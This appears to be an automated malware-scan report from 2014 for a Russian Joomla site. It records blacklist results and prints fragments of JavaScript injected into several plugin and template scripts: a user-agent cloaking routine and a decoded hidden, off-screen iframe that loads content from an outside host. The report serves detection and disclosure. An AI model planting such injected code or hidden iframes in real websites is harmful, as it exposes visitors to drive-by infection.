Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=matveeva-lichnost.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://matveeva-lichnost.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://matveeva-lichnost.ru/ | 200 OK Content-Length: 40684 Content-Type: text/html | clean |
http://matveeva-lichnost.ru/plugins/system/jceutilities/js/jceutilities.js?v=2.2.3 | 200 OK Content-Length: 28221 Content-Type: application/javascript | clean |
http://matveeva-lichnost.ru/plugins/system/mediaobject/js/mediaobject-150.js | 200 OK Content-Length: 5407 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros } } function writeFlash(p) { MediaObject.flash(p); } function writeShockWave(p) { MediaObject.shockwave(p); } function writeQuickTime(p) { MediaObject.quicktime(p); } function writeRealMedia(p) { MediaObject.realmedia(p); } function writeWindowsMedia(p) { MediaObject.windowsmedia(p); } function writeDivX(p) { MediaObject.divx(p); } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://matveeva-lichnost.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 28716 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://matveeva-lichnost.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 5515 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://matveeva-lichnost.ru/media/system/js/caption.js | 200 OK Content-Length: 3500 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[2637 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://matveeva-lichnost.ru/plugins/system/modalizer/modals/jquery.min.js | 404 Not Found Content-Length: 243 Content-Type: text/html | clean |
http://matveeva-lichnost.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://matveeva-lichnost.ru/plugins/system/modalizer/modals/fancybox/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14731 Content-Type: application/javascript | clean |
http://matveeva-lichnost.ru/plugins/content/highslide/highslide-with-html.js | 200 OK Content-Length: 64409 Content-Type: application/javascript | clean |
http://matveeva-lichnost.ru/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 8426 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[3752 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://matveeva-lichnost.ru/plugins/content/highslide/do_cookie.js | 200 OK Content-Length: 3994 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[3369 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://matveeva-lichnost.ru/templates/matveeva3/script.js | 200 OK Content-Length: 12592 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[4019 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://matveeva-lichnost.ru/modules/mod_pagepeel_banner/pagepeel_banner/AC_OETags.js | 200 OK Content-Length: 9364 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[4099 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://matveeva-lichnost.ru/modules/mod_googlecurrencyconverter/mod_googlecurrencyconverter_ajax.js | 200 OK Content-Length: 4788 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[4453 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 27 Sep 2014 10:14:30 GMT
Pragma: no-cache
Server: nginx/1.7.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 27 Sep 2014 10:14:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cfbd16b4c51a0eeaa3697595e5323185=vpdo8rpkjen428ts095ojkmh13; path=/
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 27 Sep 2014 10:14:30 GMT
Pragma: no-cache
Server: nginx/1.7.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 27 Sep 2014 10:14:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cfbd16b4c51a0eeaa3697595e5323185=vpdo8rpkjen428ts095ojkmh13; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Referer: http://www.google.com/search?q=matveeva-lichnost.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Referer: http://www.google.com/search?q=matveeva-lichnost.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.